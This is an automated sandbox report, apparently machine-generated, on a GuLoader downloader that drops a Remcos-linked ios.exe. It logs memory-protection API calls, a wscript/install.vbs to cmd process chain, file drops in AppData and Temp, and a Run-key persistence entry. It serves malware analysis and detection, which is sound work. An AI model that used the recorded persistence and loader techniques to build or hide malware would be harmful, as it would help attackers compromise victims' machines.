Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016705E2 8_2_016705E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016641EB 8_2_016641EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016643F3 8_2_016643F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F3DB 8_2_0166F3DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663FDB 8_2_01663FDB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016659B1 8_2_016659B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166458B 8_2_0166458B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F9F 8_2_01663F9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665866 8_2_01665866
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166FE7D 8_2_0166FE7D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664478 8_2_01664478
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665A78 8_2_01665A78
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166801C 8_2_0166801C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01672219 8_2_01672219
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016708E3 8_2_016708E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663EED 8_2_01663EED
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016642EB 8_2_016642EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01662EC2 8_2_01662EC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166428F 8_2_0166428F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166408D 8_2_0166408D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00406D5F 25_2_00406D5F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_70FD1BFF 25_2_70FD1BFF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03301CD8 25_2_03301CD8
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6707 25_2_032F6707
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7B7A 25_2_032F7B7A
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F65A3 25_2_032F65A3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F63A1 25_2_032F63A1
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F61B3 25_2_032F61B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FA5B0 25_2_032FA5B0
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302191 25_2_03302191
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F678C 25_2_032F678C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7D8C 25_2_032F7D8C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302BF7 25_2_03302BF7
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F65FF 25_2_032F65FF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F51D6 25_2_032F51D6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7C34 25_2_032F7C34
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F0001 25_2_032F0001
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6201 25_2_032F6201
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F681D 25_2_032F681D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6879 25_2_032F6879
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6474 25_2_032F6474
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F664B 25_2_032F664B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7657 25_2_032F7657
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F6253 25_2_032F6253
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F62B3 25_2_032F62B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F628B 25_2_032F628B
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F689F 25_2_032F689F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0330248D 25_2_0330248D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F62EF 25_2_032F62EF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033028F6 25_2_033028F6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F64FF 25_2_032F64FF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033016EF 25_2_033016EF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F7CC5 25_2_032F7CC5
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00406D5F 26_2_00406D5F
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_70FC1BFF 26_2_70FC1BFF
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: String function: 00402DA6 appears 52 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D3A91 NtProtectVirtualMemory, 0_2_032D3A91
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D1CD8 LoadLibraryA,NtAllocateVirtualMemory, 0_2_032D1CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0167177D NtProtectVirtualMemory, 8_2_0167177D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 NtProtectVirtualMemory,LoadLibraryA, 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F9C4 LoadLibraryA,NtAllocateVirtualMemory, 8_2_0166F9C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016664D0 NtSetInformationProcess, 8_2_016664D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F NtProtectVirtualMemory,LoadLibraryA, 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C NtProtectVirtualMemory, 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664160 NtProtectVirtualMemory, 8_2_01664160
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F77 NtProtectVirtualMemory, 8_2_01663F77
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664337 NtProtectVirtualMemory, 8_2_01664337
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F3F NtProtectVirtualMemory, 8_2_01663F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664509 NtProtectVirtualMemory, 8_2_01664509
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016641EB NtProtectVirtualMemory, 8_2_016641EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016643F3 NtProtectVirtualMemory, 8_2_016643F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663FDB NtProtectVirtualMemory, 8_2_01663FDB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F9F NtProtectVirtualMemory, 8_2_01663F9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664478 NtProtectVirtualMemory, 8_2_01664478
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663EED NtProtectVirtualMemory, 8_2_01663EED
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016642EB NtProtectVirtualMemory, 8_2_016642EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166428F NtProtectVirtualMemory, 8_2_0166428F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166408D NtProtectVirtualMemory, 8_2_0166408D
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03304010 NtResumeThread, 25_2_03304010
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03303A91 NtProtectVirtualMemory, 25_2_03303A91
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03301CD8 LoadLibraryA,NtAllocateVirtualMemory, 25_2_03301CD8
Source: C:\Users\user\AppData\Roaming\ios.exe Process Stats: CPU usage > 98%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDIFxAPI.dllp( vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameportaudio_x64.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamevm3ddevapi64-release.dll> vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1355375657.000000001D3FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1355375657.000000001D3FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ios.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\ios.exe Section loaded: edgegdi.dll
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: invalid certificate
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\ios.exe "C:\Users\user\AppData\Roaming\ios.exe"
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 1072
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 25_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 26_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\nsx9F89.tmp
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@14/18@3/3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Users\user\AppData\Roaming\ios.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-V27VY7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8688
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: DIFXAPI.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb++ source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: D:\corp\project\swnr\portaudio\build\msvc\x64\Release\portaudio_x64.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr
Source: Binary string: mshtml.pdb source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: DIFXAPI.pdbH source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr
Source: Binary string: mshtml.pdbUGP source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\devapi\Win8Release\x64\bin\vm3ddevapi64-release.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr

Data Obfuscation

Source: Yara match File source: 00000008.00000000.1148737503.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.1817719912.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2477891095.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1322446423.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1326110798.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C30C0 push eax; ret 0_2_6F7C30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C8317 push FFFFFFD5h; iretd 0_2_032C8319
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C3C7A push ebx; ret 0_2_032C3C89
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01661966 push ebx; ret 8_2_01661975
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01666003 push FFFFFFD5h; iretd 8_2_01666005
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_70FD30C0 push eax; ret 25_2_70FD30EE
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F8317 push FFFFFFD5h; iretd 25_2_032F8319
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F3C7A push ebx; ret 25_2_032F3C89
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_70FC30C0 push eax; ret 26_2_70FC30EE
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: .didat
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: .gehcont
Source: vm3ddevapi64-release.dll.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F7C1BFF
Source: C:\Users\user\AppData\Roaming\ios.exe File created: C:\Users\user\AppData\Local\Temp\nsqE5D6.tmp\System.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\nssA056.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\ios.exe File created: C:\Users\user\AppData\Local\Temp\nsdAA93.tmp\System.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\vm3ddevapi64-release.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\DiFxAPI.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe File created: C:\Users\user\AppData\Local\Temp\portaudio_x64.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ahw
